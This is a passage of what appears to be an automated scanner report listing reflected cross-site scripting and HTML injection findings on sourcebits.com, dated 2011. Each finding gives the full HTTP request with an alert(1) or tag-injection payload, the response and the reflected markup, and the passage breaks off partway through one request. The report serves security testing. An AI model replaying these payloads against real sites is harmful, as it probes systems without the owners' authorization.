This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /css/sb_announce.css23229<script>alert(1)</script>d777599492e?1305558372 HTTP/1.1
Host: www.sourcebits.com
Proxy-Connection: keep-alive
Referer: http://www.sourcebits.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=vtaam4slf514spuap2khebtuj4; X-Mapping-nbhajkek=BDC73E7CC2D1E217869AC63E75EE3DA7

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:48:28 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28672

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<h2>You were trying to reach http://www.sourcebits.com/css/sb_announce.css23229<script>alert(1)</script>d777599492e?1305558372</h2>
...[SNIP]...

1.53. http://www.sourcebits.com/css/services-leftnav.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sourcebits.com
Path:   /css/services-leftnav.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 45a24"><script>alert(1)</script>b435f257b4e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /css45a24"><script>alert(1)</script>b435f257b4e/services-leftnav.css?1292234334 HTTP/1.1
Host: www.sourcebits.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.sourcebits.com/?565bd%3Cscript%3Ealert(document.location)%3C/script%3E4880f07d5a7=1
Cookie: PHPSESSID=1fqsfclgikrhu2gr4fir36fp36; X-Mapping-nbhajkek=6075C85ECEB9C622B855771404A705BE

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:51:04 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28717

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<link rel="canonical" href="http://www.sourcebits.com/css45a24"><script>alert(1)</script>b435f257b4e/services-leftnav.css?1292234334" />
...[SNIP]...

1.54. http://www.sourcebits.com/css/services-leftnav.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sourcebits.com
Path:   /css/services-leftnav.css

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 593c3<script>alert(1)</script>8e9b69def33 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /css593c3<script>alert(1)</script>8e9b69def33/services-leftnav.css?1292234334 HTTP/1.1
Host: www.sourcebits.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.sourcebits.com/?565bd%3Cscript%3Ealert(document.location)%3C/script%3E4880f07d5a7=1
Cookie: PHPSESSID=1fqsfclgikrhu2gr4fir36fp36; X-Mapping-nbhajkek=6075C85ECEB9C622B855771404A705BE

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:51:06 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28709

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<h2>You were trying to reach http://www.sourcebits.com/css593c3<script>alert(1)</script>8e9b69def33/services-leftnav.css?1292234334</h2>
...[SNIP]...

1.55. http://www.sourcebits.com/css/services-leftnav.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sourcebits.com
Path:   /css/services-leftnav.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 63b7f"><script>alert(1)</script>f213bfa75bf was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /css/services-leftnav.css63b7f"><script>alert(1)</script>f213bfa75bf?1292234334 HTTP/1.1
Host: www.sourcebits.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.sourcebits.com/?565bd%3Cscript%3Ealert(document.location)%3C/script%3E4880f07d5a7=1
Cookie: PHPSESSID=1fqsfclgikrhu2gr4fir36fp36; X-Mapping-nbhajkek=6075C85ECEB9C622B855771404A705BE

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:51:16 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28693

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<link rel="canonical" href="http://www.sourcebits.com/css/services-leftnav.css63b7f"><script>alert(1)</script>f213bfa75bf?1292234334" />
...[SNIP]...

1.56. http://www.sourcebits.com/css/services-leftnav.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sourcebits.com
Path:   /css/services-leftnav.css

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 99721<script>alert(1)</script>a76a71cf63c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /css/services-leftnav.css99721<script>alert(1)</script>a76a71cf63c?1292234334 HTTP/1.1
Host: www.sourcebits.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.sourcebits.com/?565bd%3Cscript%3Ealert(document.location)%3C/script%3E4880f07d5a7=1
Cookie: PHPSESSID=1fqsfclgikrhu2gr4fir36fp36; X-Mapping-nbhajkek=6075C85ECEB9C622B855771404A705BE

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:51:18 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28687

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<h2>You were trying to reach http://www.sourcebits.com/css/services-leftnav.css99721<script>alert(1)</script>a76a71cf63c?1292234334</h2>
...[SNIP]...

1.57. http://www.sourcebits.com/design [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sourcebits.com
Path:   /design

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 5136e<script>alert(1)</script>563db75cdd7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /design5136e<script>alert(1)</script>563db75cdd7 HTTP/1.1
Host: www.sourcebits.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=163152062.1305928078.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=163152062.2103716654.1305928078.1305928078.1305928078.1; __utmc=163152062; __utmb=163152062.1.10.1305928078; PHPSESSID=1fqsfclgikrhu2gr4fir36fp36; X-Mapping-nbhajkek=6075C85ECEB9C622B855771404A705BE

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:55:57 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28625

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<h2>You were trying to reach http://www.sourcebits.com/design5136e<script>alert(1)</script>563db75cdd7</h2>
...[SNIP]...

1.58. http://www.sourcebits.com/design [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sourcebits.com
Path:   /design

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 39758<script>alert(1)</script>d25c3fc3c1b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /design?39758<script>alert(1)</script>d25c3fc3c1b=1 HTTP/1.1
Host: www.sourcebits.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=163152062.1305928078.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=163152062.2103716654.1305928078.1305928078.1305928078.1; __utmc=163152062; __utmb=163152062.1.10.1305928078; PHPSESSID=1fqsfclgikrhu2gr4fir36fp36; X-Mapping-nbhajkek=6075C85ECEB9C622B855771404A705BE

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:55:26 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28635

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<h2>You were trying to reach http://www.sourcebits.com/design?39758<script>alert(1)</script>d25c3fc3c1b=1</h2>
...[SNIP]...

1.59. http://www.sourcebits.com/facebook [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sourcebits.com
Path:   /facebook

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 1c331<script>alert(1)</script>f79b1dbde0a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /facebook1c331<script>alert(1)</script>f79b1dbde0a HTTP/1.1
Host: www.sourcebits.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=163152062.1305928078.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=163152062.2103716654.1305928078.1305928078.1305928078.1; __utmc=163152062; __utmb=163152062.1.10.1305928078; PHPSESSID=1fqsfclgikrhu2gr4fir36fp36; X-Mapping-nbhajkek=6075C85ECEB9C622B855771404A705BE

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:56:01 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28633

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<h2>You were trying to reach http://www.sourcebits.com/facebook1c331<script>alert(1)</script>f79b1dbde0a</h2>
...[SNIP]...

1.60. http://www.sourcebits.com/facebook [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sourcebits.com
Path:   /facebook

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload d791e<script>alert(1)</script>276f2c16505 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /facebook?d791e<script>alert(1)</script>276f2c16505=1 HTTP/1.1
Host: www.sourcebits.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=163152062.1305928078.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=163152062.2103716654.1305928078.1305928078.1305928078.1; __utmc=163152062; __utmb=163152062.1.10.1305928078; PHPSESSID=1fqsfclgikrhu2gr4fir36fp36; X-Mapping-nbhajkek=6075C85ECEB9C622B855771404A705BE

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:55:30 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28643

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<h2>You were trying to reach http://www.sourcebits.com/facebook?d791e<script>alert(1)</script>276f2c16505=1</h2>
...[SNIP]...

1.61. http://www.sourcebits.com/images/logo/favicon.png [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sourcebits.com
Path:   /images/logo/favicon.png

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 8a809<a>9d5ca3a2f33 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /images8a809<a>9d5ca3a2f33/logo/favicon.png?1288800918 HTTP/1.1
Host: www.sourcebits.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=vtaam4slf514spuap2khebtuj4; X-Mapping-nbhajkek=BDC73E7CC2D1E217869AC63E75EE3DA7; __utmz=163152062.1305928078.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=163152062.2103716654.1305928078.1305928078.1305928078.1; __utmc=163152062; __utmb=163152062.1.10.1305928078

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:50:16 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28640

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<h2>You were trying to reach http://www.sourcebits.com/images8a809<a>9d5ca3a2f33/logo/favicon.png?1288800918</h2>
...[SNIP]...

1.62. http://www.sourcebits.com/images/logo/favicon.png [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sourcebits.com
Path:   /images/logo/favicon.png

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c21a0"><a>fe177bbe1ed was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /imagesc21a0"><a>fe177bbe1ed/logo/favicon.png?1288800918 HTTP/1.1
Host: www.sourcebits.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=vtaam4slf514spuap2khebtuj4; X-Mapping-nbhajkek=BDC73E7CC2D1E217869AC63E75EE3DA7; __utmz=163152062.1305928078.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=163152062.2103716654.1305928078.1305928078.1305928078.1; __utmc=163152062; __utmb=163152062.1.10.1305928078

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:49:59 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28648

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<link rel="canonical" href="http://www.sourcebits.com/imagesc21a0"><a>fe177bbe1ed/logo/favicon.png?1288800918" />
...[SNIP]...

1.63. http://www.sourcebits.com/images/logo/favicon.png [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sourcebits.com
Path:   /images/logo/favicon.png

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 3ebfd<a>66173ae33c1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /images/logo3ebfd<a>66173ae33c1/favicon.png?1288800918 HTTP/1.1
Host: www.sourcebits.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=vtaam4slf514spuap2khebtuj4; X-Mapping-nbhajkek=BDC73E7CC2D1E217869AC63E75EE3DA7; __utmz=163152062.1305928078.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=163152062.2103716654.1305928078.1305928078.1305928078.1; __utmc=163152062; __utmb=163152062.1.10.1305928078

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:50:56 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28621

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<h2>You were trying to reach http://www.sourcebits.com/images/logo3ebfd<a>66173ae33c1/favicon.png?1288800918</h2>
...[SNIP]...

1.64. http://www.sourcebits.com/images/logo/favicon.png [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sourcebits.com
Path:   /images/logo/favicon.png

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 14bb0"><a>df6e3209a20 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /images/logo14bb0"><a>df6e3209a20/favicon.png?1288800918 HTTP/1.1
Host: www.sourcebits.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=vtaam4slf514spuap2khebtuj4; X-Mapping-nbhajkek=BDC73E7CC2D1E217869AC63E75EE3DA7; __utmz=163152062.1305928078.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=163152062.2103716654.1305928078.1305928078.1305928078.1; __utmc=163152062; __utmb=163152062.1.10.1305928078

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:50:40 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28627

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<link rel="canonical" href="http://www.sourcebits.com/images/logo14bb0"><a>df6e3209a20/favicon.png?1288800918" />
...[SNIP]...

1.65. http://www.sourcebits.com/images/logo/favicon.png [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sourcebits.com
Path:   /images/logo/favicon.png

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a22fa"><a>6d7cd730918 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /images/logo/favicon.pnga22fa"><a>6d7cd730918?1288800918 HTTP/1.1
Host: www.sourcebits.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=vtaam4slf514spuap2khebtuj4; X-Mapping-nbhajkek=BDC73E7CC2D1E217869AC63E75EE3DA7; __utmz=163152062.1305928078.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=163152062.2103716654.1305928078.1305928078.1305928078.1; __utmc=163152062; __utmb=163152062.1.10.1305928078

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:51:13 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28627

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<link rel="canonical" href="http://www.sourcebits.com/images/logo/favicon.pnga22fa"><a>6d7cd730918?1288800918" />
...[SNIP]...

1.66. http://www.sourcebits.com/images/logo/favicon.png [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sourcebits.com
Path:   /images/logo/favicon.png

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 14834<a>922a4dbb0ba was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /images/logo/favicon.png14834<a>922a4dbb0ba?1288800918 HTTP/1.1
Host: www.sourcebits.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
